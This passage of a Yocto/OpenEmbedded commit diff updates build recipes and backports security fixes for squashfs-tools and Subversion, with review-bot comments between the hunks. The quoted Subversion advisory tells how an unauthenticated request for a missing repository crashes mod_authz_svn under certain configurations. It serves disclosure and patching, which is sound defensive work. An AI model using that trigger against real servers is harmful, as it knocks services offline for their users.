+ dire->name[dire->size + 1] = '\0';
++
++ /* check name for invalid characters (i.e /, ., ..) */
++ if(check_name(dire->name, dire->size + 1) == FALSE) {
++ ERROR("File system corrupted: invalid characters in name\n");
++ goto corrupted;
++ }
++
+ TRACE("squashfs_opendir: directory entry %s, inode "
+ "%d:%d, type %d\n", dire->name,
+ dirh.start_block, dire->offset, dire->type);
+diff --git a/squashfs-tools/unsquashfs.h b/squashfs-tools/unsquashfs.h
+index 934618b2..db1da7a0 100644
+--- a/squashfs-tools/unsquashfs.h
++++ b/squashfs-tools/unsquashfs.h
+@@ -4,7 +4,7 @@
+ * Unsquash a squashfs filesystem. This is a highly compressed read only
+ * filesystem.
+ *
+- * Copyright (c) 2009, 2010, 2013, 2014, 2019
++ * Copyright (c) 2009, 2010, 2013, 2014, 2019, 2021
+ * Phillip Lougher <phillip@squashfs.org.uk>
+ *
+ * This program is free software; you can redistribute it and/or
+@@ -261,4 +261,7 @@ extern int read_ids(int, long long, long long, unsigned int **);
+
+ /* unsquash-34.c */
+ extern long long *alloc_index_table(int);
++
++/* unsquash-1234.c */
++extern int check_name(char *, int);
+ #endif
diff --git a/meta/recipes-devtools/squashfs-tools/squashfs-tools_git.bb b/meta/recipes-devtools/squashfs-tools/squashfs-tools_git.bb
index b06951df36..5d754b20b3 100644
--- a/meta/recipes-devtools/squashfs-tools/squashfs-tools_git.bb
+++ b/meta/recipes-devtools/squashfs-tools/squashfs-tools_git.bb
@@ -1,14 +1,17 @@
# Note, we can probably remove the lzma option as it has be replaced with xz,
# and I don't think the kernel supports it any more.
SUMMARY = "Tools for manipulating SquashFS filesystems"
+HOMEPAGE = "https://github.com/plougher/squashfs-tools"
+DESCRIPTION = "Tools to create and extract Squashfs filesystems."
SECTION = "base"
LICENSE = "GPL-2"
LIC_FILES_CHKSUM = "file://../COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
PV = "4.4"
SRCREV = "52eb4c279cd283ed9802dd1ceb686560b22ffb67"
-SRC_URI = "git://github.com/plougher/squashfs-tools.git;protocol=https \
+SRC_URI = "git://github.com/plougher/squashfs-tools.git;protocol=https;branch=master \
file://0001-squashfs-tools-fix-build-failure-against-gcc-10.patch;striplevel=2 \
+ file://CVE-2021-40153.patch;striplevel=2 \
"
S = "${WORKDIR}/git/squashfs-tools"
diff --git a/meta/recipes-devtools/strace/strace/run-ptest b/meta/recipes-devtools/strace/strace/run-ptest
index 4660207220..3a51fb0be9 100755
--- a/meta/recipes-devtools/strace/strace/run-ptest
+++ b/meta/recipes-devtools/strace/strace/run-ptest
@@ -1,5 +1,5 @@
#!/bin/sh
-export TIMEOUT_DURATION=120
+export TIMEOUT_DURATION=240
chown nobody tests
chown nobody tests/*
chown nobody ../ptest
diff --git a/meta/recipes-devtools/strace/strace_5.5.bb b/meta/recipes-devtools/strace/strace_5.5.bb
index ae552da028..4121cfcce7 100644
--- a/meta/recipes-devtools/strace/strace_5.5.bb
+++ b/meta/recipes-devtools/strace/strace_5.5.bb
@@ -1,5 +1,6 @@
SUMMARY = "System call tracing tool"
HOMEPAGE = "http://strace.io"
+DESCRIPTION = "strace is a diagnostic, debugging and instructional userspace utility for Linux. It is used to monitor and tamper with interactions between processes and the Linux kernel, which include system calls, signal deliveries, and changes of process state."
SECTION = "console/utils"
LICENSE = "LGPL-2.1+ & GPL-2+"
LIC_FILES_CHKSUM = "file://COPYING;md5=c756d9d5dabc27663df64f0bf492166c"
diff --git a/meta/recipes-devtools/subversion/subversion/CVE-2020-17525.patch b/meta/recipes-devtools/subversion/subversion/CVE-2020-17525.patch
new file mode 100644
index 0000000000..5bebde2a86
--- /dev/null
+++ b/meta/recipes-devtools/subversion/subversion/CVE-2020-17525.patch
@@ -0,0 +1,117 @@
+Upstream-Status: Backport [ https://subversion.apache.org/security/CVE-2020-17525-advisory.txt ]
+CVE: CVE-2020-17525
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+ Remote unauthenticated denial-of-service in Subversion mod_authz_svn.
+
+Summary:
+========
+
+ Subversion's mod_authz_svn module will crash if the server is using
+ in-repository authz rules with the AuthzSVNReposRelativeAccessFile
+ option and a client sends a request for a non-existing repository URL.
+
+ This can lead to disruption for users of the service.
+
+Known vulnerable:
+=================
+
+ mod_dav_svn+mod_authz_svn servers 1.9.0 through 1.10.6 (inclusive).
+ mod_dav_svn+mod_authz_svn servers 1.11.0 through 1.14.0 (inclusive).
+
+Known fixed:
+============
+
+ mod_dav_svn+mod_authz_svn servers 1.14.1
+ mod_dav_svn+mod_authz_svn servers 1.10.7
+
+Details:
+========
+
+ A null-pointer-dereference has been found in mod_authz_svn that results in
+ a remote unauthenticated Denial-of-Service in some server configurations.
+
+ The vulnerability can be triggered by an unauthenticated user if the
+ Apache HTTPD server is configured to use an in-repository authz file,
+ with configuration directives such as:
+
+ AuthzSVNAccessFile "^/authz"
+ AuthzSVNReposRelativeAccessFile "^/authz"
+
+ The problem originates when sending a GET request to a non-existent
+ repository. The mod_authz_svn module will attempt to find authz rules
+ at a path within the requested SVN repository. Upon constructing this
+ path, the function svn_repos_find_root_path will return a NULL pointer
+ since the requested repository does not exist on-disk.
+ A check for this legitimate NULL pointer condition is missing, which
+ results in a segmentation fault when the NULL pointer is used.
+
+ The in-repository authz feature was first introduced in Subversion 1.8:
+ https://subversion.apache.org/docs/release-notes/1.8.html#in-repo-authz
+
+ The missing NULL check was first introduced during refactoring of the
+ authz code during development work leading up to Subversion 1.9.
+ Subversion 1.8 servers are unaffected.
+
+Severity:
+=========
+
+ CVSSv3 Base Score: 7.5 (High)
+
+ CVSSv3 Base Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
+
+ Exploitation results in denial of service by crashing the HTTPD worker
+ handling the request. The impact of this differs depending on how the
+ Apache HTTPD server is configured, including the choice of MPM (Multi-
+ Processing-Module). If the worker shares its memory address space with
+ the main thread, as is the case with e.g. the Event MPM, the entire
+ HTTPD server process will terminate. If the pre-fork MPM is used, the
+ worker will terminate but the HTTPD server will stay up, and service
+ availability will depend on how frequently the attacker is able to
+ send malicious requests which target the vulnerability.
+
+Recommendations:
+================
+
+ We recommend all users to upgrade to a known fixed release of the
+ Subversion mod_dav_svn server.
+
+ Users who are unable to upgrade may apply the included patches.
+
+ As a workaround, the use of in-repository authz rules files with
+ the AuthzSVNReposRelativeAccessFile can be avoided by switching
+ to an alternative configuration which fetches an authz rules file
+ from the server's filesystem, rather than from an SVN repository.
+
+References:
+===========
+
+ CVE-2020-17525 (Subversion)
+
+Reported by:
+============
+
+ Thomas Ã…kesson, simonsoft.se
+
+Patches:
+========
+
+ Patch for Subversion 1.10, 1.14:
+
+[[[
+Index: subversion/libsvn_repos/config_file.c
+===================================================================
+--- a/subversion/libsvn_repos/config_file.c (revision 1883994)
++++ b/subversion/libsvn_repos/config_file.c (working copy)
+@@ -237,6 +237,10 @@ get_repos_config(svn_stream_t **stream,
+ {
+ /* Search for a repository in the full path. */
+ repos_root_dirent = svn_repos_find_root_path(dirent, scratch_pool);
++ if (repos_root_dirent == NULL)
++ return svn_error_trace(handle_missing_file(stream, checksum, access,
++ url, must_exist,
++ svn_node_none));
+
+ /* Attempt to open a repository at repos_root_dirent. */
+ SVN_ERR(svn_repos_open3(&access->repos, repos_root_dirent, NULL,
+]]]
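Review bot: The embedded fix is labelled `Patch for Subversion 1.10, 1.14`, but this file sits under the subversion 1.13.0 recipe, so the hunk against `get_repos_config` in `config_file.c` should be confirmed to apply to the 1.13.0 sources without fuzz. The advisory text lists 1.11.0 through 1.14.0 as vulnerable, so the NULL check on `repos_root_dirent` is needed here. The reporter's name under `Reported by:` is mis-encoded (`Ã…kesson`), which suggests the advisory was pasted in the wrong character set; re-saving the header as UTF-8 would repair it. `get_repos_config` starts and ends outside the embedded hunk, so the rest of the error path cannot be checked from here.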
diff --git a/meta/recipes-devtools/subversion/subversion/CVE-2021-28544.patch b/meta/recipes-devtools/subversion/subversion/CVE-2021-28544.patch
new file mode 100644
index 0000000000..030ead6c66
--- /dev/null
+++ b/meta/recipes-devtools/subversion/subversion/CVE-2021-28544.patch
@@ -0,0 +1,146 @@
+From 61382fd8ea66000bd9ee8e203a6eab443220ee40 Mon Sep 17 00:00:00 2001
+From: Nathan Hartman <hartmannathan@apache.org>
+Date: Sun, 27 Mar 2022 05:59:18 +0000
+Subject: [PATCH] On the 1.14.x-r1899227 branch: Merge r1899227 from trunk
+ w/testlist variation
+
+git-svn-id: https://svn.apache.org/repos/asf/subversion/branches/1.14.x-r1899227@1899229 13f79535-47bb-0310-9956-ffa450edef68
+
+CVE: CVE-2021-28544 [https://github.com/apache/subversion/commit/61382fd8ea66000bd9ee8e203a6eab443220ee40]
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ subversion/libsvn_repos/log.c | 26 +++++-------
+ subversion/tests/cmdline/authz_tests.py | 55 +++++++++++++++++++++++++
+ 2 files changed, 65 insertions(+), 16 deletions(-)
+
+diff --git a/subversion/libsvn_repos/log.c b/subversion/libsvn_repos/log.c
+index d9a1fb1085e16..41ca8aed27174 100644
+--- a/subversion/libsvn_repos/log.c
++++ b/subversion/libsvn_repos/log.c
+@@ -337,42 +337,36 @@ detect_changed(svn_repos_revision_access_level_t *access_level,
+ if ( (change->change_kind == svn_fs_path_change_add)
+ || (change->change_kind == svn_fs_path_change_replace))
+ {
+- const char *copyfrom_path = change->copyfrom_path;
+- svn_revnum_t copyfrom_rev = change->copyfrom_rev;
+-
+ /* the following is a potentially expensive operation since on FSFS
+ we will follow the DAG from ROOT to PATH and that requires
+ actually reading the directories along the way. */
+ if (!change->copyfrom_known)
+ {
+- SVN_ERR(svn_fs_copied_from(&copyfrom_rev, &copyfrom_path,
++ SVN_ERR(svn_fs_copied_from(&change->copyfrom_rev, &change->copyfrom_path,
+ root, path, iterpool));
+ change->copyfrom_known = TRUE;
+ }
+
+- if (copyfrom_path && SVN_IS_VALID_REVNUM(copyfrom_rev))
++ if (change->copyfrom_path && SVN_IS_VALID_REVNUM(change->copyfrom_rev))
+ {
+- svn_boolean_t readable = TRUE;
+-
+ if (callbacks->authz_read_func)
+ {
+ svn_fs_root_t *copyfrom_root;
++ svn_boolean_t readable;
+
+ SVN_ERR(svn_fs_revision_root(&copyfrom_root, fs,
+- copyfrom_rev, iterpool));
++ change->copyfrom_rev, iterpool));
+ SVN_ERR(callbacks->authz_read_func(&readable,
+ copyfrom_root,
+- copyfrom_path,
++ change->copyfrom_path,
+ callbacks->authz_read_baton,
+ iterpool));
+ if (! readable)
+- found_unreadable = TRUE;
+- }
+-
+- if (readable)
+- {
+- change->copyfrom_path = copyfrom_path;
+- change->copyfrom_rev = copyfrom_rev;
++ {
++ found_unreadable = TRUE;
++ change->copyfrom_path = NULL;
++ change->copyfrom_rev = SVN_INVALID_REVNUM;
++ }
+ }
+ }
+ }
+diff --git a/subversion/tests/cmdline/authz_tests.py b/subversion/tests/cmdline/authz_tests.py
+index 760cb3663d02f..92e8a5e1935c9 100755
+--- a/subversion/tests/cmdline/authz_tests.py
++++ b/subversion/tests/cmdline/authz_tests.py
+@@ -1731,6 +1731,60 @@ def empty_group(sbox):
+ '--username', svntest.main.wc_author,
+ sbox.repo_url)
+
++@Skip(svntest.main.is_ra_type_file)
++def log_inaccessible_copyfrom(sbox):
++ "log doesn't leak inaccessible copyfrom paths"
++
++ sbox.build(empty=True)
++ sbox.simple_add_text('secret', 'private')
++ sbox.simple_commit(message='log message for r1')
++ sbox.simple_copy('private', 'public')
++ sbox.simple_commit(message='log message for r2')
++
++ svntest.actions.enable_revprop_changes(sbox.repo_dir)
++ # Remove svn:date and svn:author for predictable output.
++ svntest.actions.run_and_verify_svn(None, [], 'propdel', '--revprop',
++ '-r2', 'svn:date', sbox.repo_url)
++ svntest.actions.run_and_verify_svn(None, [], 'propdel', '--revprop',
++ '-r2', 'svn:author', sbox.repo_url)
++
++ write_restrictive_svnserve_conf(sbox.repo_dir)
++
++ # First test with blanket access.
++ write_authz_file(sbox,
++ {"/" : "* = rw"})
++ expected_output = svntest.verify.ExpectedOutput([
++ "------------------------------------------------------------------------\n",
++ "r2 | (no author) | (no date) | 1 line\n",
++ "Changed paths:\n",
++ " A /public (from /private:1)\n",
++ "\n",
++ "log message for r2\n",
++ "------------------------------------------------------------------------\n",
++ ])
++ svntest.actions.run_and_verify_svn(expected_output, [],
++ 'log', '-r2', '-v',
++ sbox.repo_url)
++
++ # Now test with an inaccessible copy source (/private).
++ write_authz_file(sbox,
++ {"/" : "* = rw"},
++ {"/private" : "* ="})
++ expected_output = svntest.verify.ExpectedOutput([
++ "------------------------------------------------------------------------\n",
++ "r2 | (no author) | (no date) | 1 line\n",
++ "Changed paths:\n",
++ # The copy is shown as a plain add with no copyfrom info.
++ " A /public\n",
++ "\n",
++ # No log message, as the revision is only partially visible.
++ "\n",
++ "------------------------------------------------------------------------\n",
++ ])
++ svntest.actions.run_and_verify_svn(expected_output, [],
++ 'log', '-r2', '-v',
++ sbox.repo_url)
++
+
+ ########################################################################
+ # Run the tests
+@@ -1771,6 +1825,7 @@ def empty_group(sbox):
+ inverted_group_membership,
+ group_member_empty_string,
+ empty_group,
++ log_inaccessible_copyfrom,
+ ]
+ serial_only = True
+
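Review bot: In the `detect_changed` hunk of log.c, the new `if (! readable)` branch clears `change->copyfrom_path` and `change->copyfrom_rev` without a comment, although that clearing is the whole fix. `svn_fs_copied_from` now writes straight into `change`, so both fields hold the copy source before the authz callback has been consulted. I would add `/* Copy source is not readable by this user: drop it so it is not reported. */` above the two assignments. When `callbacks->authz_read_func` is NULL the copy source is kept, which matches the old behaviour. The patch was cut from the 1.14.x branch and is applied to 1.13.0 here, so its context should be checked against that tree; `detect_changed` starts and ends outside the hunk.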
diff --git a/meta/recipes-devtools/subversion/subversion_1.13.0.bb b/meta/recipes-devtools/subversion/subversion_1.13.0.bb
index b3c44ca9b9..5643191569 100644
--- a/meta/recipes-devtools/subversion/subversion_1.13.0.bb
+++ b/meta/recipes-devtools/subversion/subversion_1.13.0.bb
@@ -1,5 +1,6 @@
SUMMARY = "Subversion (svn) version control system client"
HOMEPAGE = "http://subversion.apache.org"
+DESCRIPTION = "Subversion is an open source version control system."
SECTION = "console/network"
LICENSE = "Apache-2 & MIT"
LIC_FILES_CHKSUM = "file://LICENSE;md5=6487ae7094d359fa90fb9c4096e52e2b"
@@ -11,6 +12,8 @@ SRC_URI = "${APACHE_MIRROR}/${BPN}/${BPN}-${PV}.tar.bz2 \
file://disable_macos.patch \
file://0001-Fix-libtool-name-in-configure.ac.patch \
file://serfmacro.patch \
+ file://CVE-2020-17525.patch \
+ file://CVE-2021-28544.patch \
"
SRC_URI[md5sum] = "3004b4dae18bf45a0b6ea4ef8820064d"
diff --git a/meta/recipes-devtools/swig/swig/determinism.patch b/meta/recipes-devtools/swig/swig/determinism.patch
new file mode 100644
index 0000000000..8ffb4bce8e
--- /dev/null
+++ b/meta/recipes-devtools/swig/swig/determinism.patch
@@ -0,0 +1,19 @@
+Remove the compiler commandline/platform from the compiled binary as this
+breaks reproducibilty.
+
+Upstream-Status: Inappropriate [OE reproducibiity fix upstream unlikely to take]
+RP 2021/3/1
+
+
+Index: swig-3.0.12/Source/Modules/main.cxx
+===================================================================
+--- swig-3.0.12.orig/Source/Modules/main.cxx
++++ swig-3.0.12/Source/Modules/main.cxx
+@@ -636,7 +636,6 @@ void SWIG_getoptions(int argc, char *arg
+ }
+ } else if (strcmp(argv[i], "-version") == 0) {
+ fprintf(stdout, "\nSWIG Version %s\n", Swig_package_version());
+- fprintf(stdout, "\nCompiled with %s [%s]\n", SWIG_CXX, SWIG_PLATFORM);
+ fprintf(stdout, "\nConfigured options: %cpcre\n",
+ #ifdef HAVE_PCRE
+ '+'
diff --git a/meta/recipes-devtools/swig/swig_3.0.12.bb b/meta/recipes-devtools/swig/swig_3.0.12.bb
index 45026c9700..090aaa8112 100644
--- a/meta/recipes-devtools/swig/swig_3.0.12.bb
+++ b/meta/recipes-devtools/swig/swig_3.0.12.bb
@@ -6,6 +6,7 @@ SRC_URI += "file://0001-Use-proc-self-exe-for-swig-swiglib-on-non-Win32-plat.pat
file://swig-3.0.12-Coverity-fix-issue-reported-for-SWIG_Python_FixMetho.patch \
file://Python-Fix-new-GCC8-warnings-in-generated-code.patch \
file://0001-Fix-generated-code-for-constant-expressions-containi.patch \
+ file://determinism.patch \
"
SRC_URI[md5sum] = "82133dfa7bba75ff9ad98a7046be687c"
SRC_URI[sha256sum] = "7cf9f447ae7ed1c51722efc45e7f14418d15d7a1e143ac9f09a668999f4fc94d"
diff --git a/meta/recipes-devtools/syslinux/syslinux/determinism.patch b/meta/recipes-devtools/syslinux/syslinux/determinism.patch
new file mode 100644
index 0000000000..2fb8c64df3
--- /dev/null
+++ b/meta/recipes-devtools/syslinux/syslinux/determinism.patch
@@ -0,0 +1,22 @@
+In order to build deterministic binaries, we need to sort the wildcard expansion
+so the libraries are linked in the same order each time. This fixes reproducibility
+issues within syslinux builds.
+
+Upstream-Status: Pending
+RP 2021/3/1
+
+Index: syslinux-6.04-pre2/mk/lib.mk
+===================================================================
+--- syslinux-6.04-pre2.orig/mk/lib.mk
++++ syslinux-6.04-pre2/mk/lib.mk
+@@ -130,8 +130,8 @@ LIBENTRY_OBJS = \
+ exit.o
+
+ LIBGCC_OBJS = \
+- $(patsubst $(com32)/lib/%.c,%.o,$(wildcard $(com32)/lib/$(ARCH)/libgcc/*.c)) \
+- $(patsubst $(com32)/lib/%.S,%.o,$(wildcard $(com32)/lib/$(ARCH)/libgcc/*.S))
++ $(sort $(patsubst $(com32)/lib/%.c,%.o,$(wildcard $(com32)/lib/$(ARCH)/libgcc/*.c))) \
++ $(sort $(patsubst $(com32)/lib/%.S,%.o,$(wildcard $(com32)/lib/$(ARCH)/libgcc/*.S)))
+
+ LIBCONSOLE_OBJS = \
+ \
diff --git a/meta/recipes-devtools/syslinux/syslinux_6.04-pre2.bb b/meta/recipes-devtools/syslinux/syslinux_6.04-pre2.bb
index 3e7eef3a75..a5618327bf 100644
--- a/meta/recipes-devtools/syslinux/syslinux_6.04-pre2.bb
+++ b/meta/recipes-devtools/syslinux/syslinux_6.04-pre2.bb
@@ -1,5 +1,6 @@
SUMMARY = "Multi-purpose linux bootloader"
HOMEPAGE = "http://www.syslinux.org/"
+DESCRIPTION = "The Syslinux Project covers lightweight bootloaders for MS-DOS FAT filesystems (SYSLINUX), network booting (PXELINUX), bootable "El Torito" CD-ROMs (ISOLINUX), and Linux ext2/ext3/ext4 or btrfs filesystems (EXTLINUX). The project also includes MEMDISK, a tool to boot legacy operating systems (such as DOS) from nontraditional media; it is usually used in conjunction with PXELINUX and ISOLINUX."
LICENSE = "GPLv2+"
LIC_FILES_CHKSUM = "file://COPYING;md5=0636e73ff0215e8d672dc4c32c317bb3 \
file://README;beginline=35;endline=41;md5=558f2c71cb1fb9ba511ccd4858e48e8a"
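Review bot: The new `DESCRIPTION` value puts `"El Torito"` in double quotes inside a double-quoted assignment, so the string appears to end after `bootable`. That tends to confuse editors and linters even where the recipe parser accepts it. Writing the inner name with single quotes, `bootable 'El Torito' CD-ROMs`, keeps the text and removes the ambiguity. The value is also one very long line; the backslash-continued form used for the systemd-bootchart `DESCRIPTION` in this same commit would be easier to review.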
@@ -22,11 +23,16 @@ SRC_URI = "https://www.zytor.com/pub/syslinux/Testing/6.04/syslinux-${PV}.tar.xz
file://0009-linux-syslinux-implement-install_bootblock.patch \
file://0010-Workaround-multiple-definition-of-symbol-errors.patch \
file://0001-install-don-t-install-obsolete-file-com32.ld.patch \
+ file://determinism.patch \
"
SRC_URI[md5sum] = "2b31c78f087f99179feb357da312d7ec"
SRC_URI[sha256sum] = "4441a5d593f85bb6e8d578cf6653fb4ec30f9e8f4a2315a3d8f2d0a8b3fadf94"
+# remove at next version upgrade or when output changes
+PR = "r1"
+HASHEQUIV_HASH_VERSION .= ".1"
+
UPSTREAM_CHECK_URI = "https://www.zytor.com/pub/syslinux/"
UPSTREAM_CHECK_REGEX = "syslinux-(?P<pver>.+)\.tar"
UPSTREAM_VERSION_UNKNOWN = "1"
diff --git a/meta/recipes-devtools/systemd-bootchart/systemd-bootchart_233.bb b/meta/recipes-devtools/systemd-bootchart/systemd-bootchart_233.bb
index a7a1f0ff1a..e1233ffde0 100644
--- a/meta/recipes-devtools/systemd-bootchart/systemd-bootchart_233.bb
+++ b/meta/recipes-devtools/systemd-bootchart/systemd-bootchart_233.bb
@@ -1,8 +1,14 @@
+SUMMARY = "Boot performance graphing tool"
+DESCRIPTION = "For systemd-bootchart, several proc debug interfaces are required in the kernel config: \
+ CONFIG_SCHEDSTATS \
+below is optional, for additional info: \
+ CONFIG_SCHED_DEBUG"
+HOMEPAGE = "https://github.com/systemd/systemd-bootchart"
LICENSE = "LGPLv2.1 & GPLv2"
LIC_FILES_CHKSUM = "file://LICENSE.LGPL2.1;md5=4fbd65380cdd255951079008b364516c \
file://LICENSE.GPL2;md5=751419260aa954499f7abaabaa882bbe"
-SRC_URI = "git://github.com/systemd/systemd-bootchart.git;protocol=https \
+SRC_URI = "git://github.com/systemd/systemd-bootchart.git;protocol=https;branch=master \
file://0001-architecture-Recognise-RISCV-32-RISCV-64.patch \
file://mips64.patch \
"
diff --git a/meta/recipes-devtools/tcf-agent/tcf-agent_git.bb b/meta/recipes-devtools/tcf-agent/tcf-agent_git.bb
index ed14fe66b1..b671956cc8 100644
--- a/meta/recipes-devtools/tcf-agent/tcf-agent_git.bb
+++ b/meta/recipes-devtools/tcf-agent/tcf-agent_git.bb
@@ -1,5 +1,6 @@
SUMMARY = "Target Communication Framework for the Eclipse IDE"
HOMEPAGE = "http://wiki.eclipse.org/TCF"
+DESCRIPTION = "TCF is a vendor-neutral, lightweight, extensible network protocol mainly for communicating with embedded systems (targets)."
BUGTRACKER = "https://bugs.eclipse.org/bugs/"
LICENSE = "EPL-1.0 | EDL-1.0"
@@ -9,7 +10,7 @@ SRCREV = "a022ef2f1acfd9209a1bf792dda14ae4b0d1b60f"
PV = "1.7.0+git${SRCPV}"
UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>(\d+(\.\d+)+))"
-SRC_URI = "git://git.eclipse.org/gitroot/tcf/org.eclipse.tcf.agent \
+SRC_URI = "git://git.eclipse.org/r/tcf/org.eclipse.tcf.agent.git;protocol=https;branch=master \
file://fix_ranlib.patch \
file://ldflags.patch \
file://tcf-agent.init \
diff --git a/meta/recipes-devtools/tcltk/tcl_8.6.10.bb b/meta/recipes-devtools/tcltk/tcl_8.6.10.bb
index aedd96b021..35a91b4f09 100644
--- a/meta/recipes-devtools/tcltk/tcl_8.6.10.bb
+++ b/meta/recipes-devtools/tcltk/tcl_8.6.10.bb
@@ -1,5 +1,6 @@
SUMMARY = "Tool Command Language"
HOMEPAGE = "http://tcl.sourceforge.net"
+DESCRIPTION = "Tool Command Language, is an open-source multi-purpose C library which includes a powerful dynamic scripting language. Together they provide ideal cross-platform development environment for any programming project."
SECTION = "devel/tcltk"
# http://www.tcl.tk/software/tcltk/license.html
@@ -32,6 +33,7 @@ SRC_URI_class-native = "${BASE_SRC_URI}"
S = "${WORKDIR}/${BPN}${PV}/unix"
+PSEUDO_IGNORE_PATHS .= ",${WORKDIR}/${BPN}${PV}"
VER = "${PV}"
inherit autotools ptest binconfig update-alternatives
diff --git a/meta/recipes-devtools/unfs3/unfs3_git.bb b/meta/recipes-devtools/unfs3/unfs3_git.bb
index d60cee87c9..d1b3fb8f57 100644
--- a/meta/recipes-devtools/unfs3/unfs3_git.bb
+++ b/meta/recipes-devtools/unfs3/unfs3_git.bb
@@ -2,6 +2,7 @@ SUMMARY = "Userspace NFS server v3 protocol"
DESCRIPTION = "UNFS3 is a user-space implementation of the NFSv3 server \
specification. It provides a daemon for the MOUNT and NFS protocols, which \
are used by NFS clients for accessing files on the server."
+HOMEPAGE = "https://github.com/unfs3/unfs3"
SECTION = "console/network"
LICENSE = "unfs3"
LIC_FILES_CHKSUM = "file://LICENSE;md5=9475885294e17c0cc0067820d042792e"
@@ -13,7 +14,7 @@ DEPENDS_append_class-nativesdk = " flex-nativesdk"
ASNEEDED = ""
S = "${WORKDIR}/git"
-SRC_URI = "git://github.com/unfs3/unfs3.git;protocol=https \
+SRC_URI = "git://github.com/unfs3/unfs3.git;protocol=https;branch=master \
file://unfs3_parallel_build.patch \
file://alternate_rpc_ports.patch \
file://fix_pid_race_parent_writes_child_pid.patch \
@@ -35,7 +36,7 @@ BBCLASSEXTEND = "native nativesdk"
inherit autotools
EXTRA_OECONF_append_class-native = " --sbindir=${bindir}"
CFLAGS_append = " -I${STAGING_INCDIR}/tirpc"
-LDFLAGS_append = " -ltirpc"
+EXTRA_OECONF_append = " LIBS=-ltirpc"
# Turn off these header detects else the inode search
# will walk entire file systems and this is a real problem
diff --git a/meta/recipes-devtools/unifdef/unifdef_2.12.bb b/meta/recipes-devtools/unifdef/unifdef_2.12.bb
index 22b10ba234..b42051b8b6 100644
--- a/meta/recipes-devtools/unifdef/unifdef_2.12.bb
+++ b/meta/recipes-devtools/unifdef/unifdef_2.12.bb
@@ -2,6 +2,7 @@ SUMMARY = "Selectively remove #ifdef statements from sources"
SECTION = "devel"
LICENSE = "BSD-2-Clause"
HOMEPAGE = "http://dotat.at/prog/unifdef/"
+DESCRIPTION = "The unifdef utility selectively processes conditional C preprocessor #if and #ifdef directives. It removes from a file both the directives and the additional text that they delimit, while otherwise leaving the file alone."
LIC_FILES_CHKSUM = "file://COPYING;md5=3498caf346f6b77934882101749ada23 \
file://unifdef.c;endline=32;md5=6f4ee8085d6e6ab0f7cb4390e1a9c497 \
diff --git a/meta/recipes-devtools/vala/vala.inc b/meta/recipes-devtools/vala/vala.inc
index 703ed1aa8d..71da2ef07c 100644
--- a/meta/recipes-devtools/vala/vala.inc
+++ b/meta/recipes-devtools/vala/vala.inc
@@ -1,4 +1,5 @@
SUMMARY = "C#-like programming language for easing GObject programming"
+HOMEPAGE = "http://vala-project.org"
DESCRIPTION = "Vala is a C#-like language dedicated to ease GObject programming. \
Vala compiles to plain C and has no runtime environment nor penalities whatsoever."
SECTION = "devel"
@@ -12,7 +13,6 @@ DEPENDS_append_class-target = " ${@bb.utils.contains('DISTRO_FEATURES', 'api-doc
# vala-native contains a native version of vapigen, which we use instead of the target one
DEPENDS_append_class-target = " vala-native"
BBCLASSEXTEND = "native"
-HOMEPAGE = "http://vala-project.org"
LICENSE = "LGPLv2.1"
LIC_FILES_CHKSUM = "file://COPYING;md5=fbc093901857fcd118f065f900982c24"
diff --git a/meta/recipes-devtools/valgrind/valgrind/0005-Modify-vg_test-wrapper-to-support-PTEST-formats.patch b/meta/recipes-devtools/valgrind/valgrind/0005-Modify-vg_test-wrapper-to-support-PTEST-formats.patch
index 7985308e41..0c399ef52c 100644
--- a/meta/recipes-devtools/valgrind/valgrind/0005-Modify-vg_test-wrapper-to-support-PTEST-formats.patch
+++ b/meta/recipes-devtools/valgrind/valgrind/0005-Modify-vg_test-wrapper-to-support-PTEST-formats.patch
@@ -19,6 +19,11 @@ Upstream-Status: Pending
Signed-off-by: Dave Lerner <dave.lerner@windriver.com>
Signed-off-by: Tudor Florea <tudor.florea@enea.com>
Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
+
+Increase time limit to 90 s.
+(double of the expected time of drd/tests/std_list on qemuarm64)
+
+Signed-off-by: Yi Fan Yu <yifan.yu@windriver.com>
---
tests/vg_regtest.in | 75 +++++++++++++++++++++++++++++++++++++++--------------
1 file changed, 55 insertions(+), 20 deletions(-)
@@ -66,7 +71,7 @@ index a441f42..cb05b52 100755
# Since most of the program time is spent in system() calls, need this to
# propagate a Ctrl-C enabling us to quit.
-sub mysystem($)
-+# Enforce 30 seconds limit for the test.
++# Enforce 90 seconds limit for the test.
+# This resume execution of the remaining tests if valgrind hangs.
+sub mysystem($)
{
@@ -76,7 +81,7 @@ index a441f42..cb05b52 100755
+ my $exit_code=0;
+ eval {
+ local $SIG{'ALRM'} = sub { die "timed out\n" };
-+ alarm(30);
++ alarm(90);
+ $exit_code = system($_[0]);
+ alarm (0);
+ ($exit_code == 2) and die "SIGINT\n"; # 2 is SIGINT
diff --git a/meta/recipes-devtools/valgrind/valgrind/remove-for-aarch64 b/meta/recipes-devtools/valgrind/valgrind/remove-for-aarch64
index a3a0c6e50f..afa6a94825 100644
--- a/meta/recipes-devtools/valgrind/valgrind/remove-for-aarch64
+++ b/meta/recipes-devtools/valgrind/valgrind/remove-for-aarch64
@@ -31,8 +31,6 @@ drd/tests/annotate_static
drd/tests/annotate_trace_memory
drd/tests/annotate_trace_memory_xml
drd/tests/atomic_var
-drd/tests/bar_bad
-drd/tests/bar_bad_xml
drd/tests/bar_trivial
drd/tests/bug-235681
drd/tests/bug322621
@@ -122,6 +120,7 @@ drd/tests/tc19_shadowmem
drd/tests/tc21_pthonce
drd/tests/tc22_exit_w_lock
drd/tests/tc23_bogus_condwait
+gdbserver_tests/hginfo
helgrind/tests/annotate_rwlock
helgrind/tests/annotate_smart_pointer
helgrind/tests/bar_bad
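Review bot: `gdbserver_tests/hginfo` is now listed both in remove-for-aarch64 (added in this hunk) and in the new remove-for-all file, so on aarch64 two loops in run-ptest hide and restore the same test. Going by the visible loops (`mv $i.vgtest $i.IGNORE` and `mv $i.IGNORE $i.vgtest`), the second `mv` of each pair would find the file already renamed and print an error. The aarch64 loop body is only partly visible here, so this is inferred. Keeping the entry only in remove-for-all avoids the duplicate, which is how `drd/tests/bar_bad` and `drd/tests/bar_bad_xml` are handled in the first hunk of this file.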
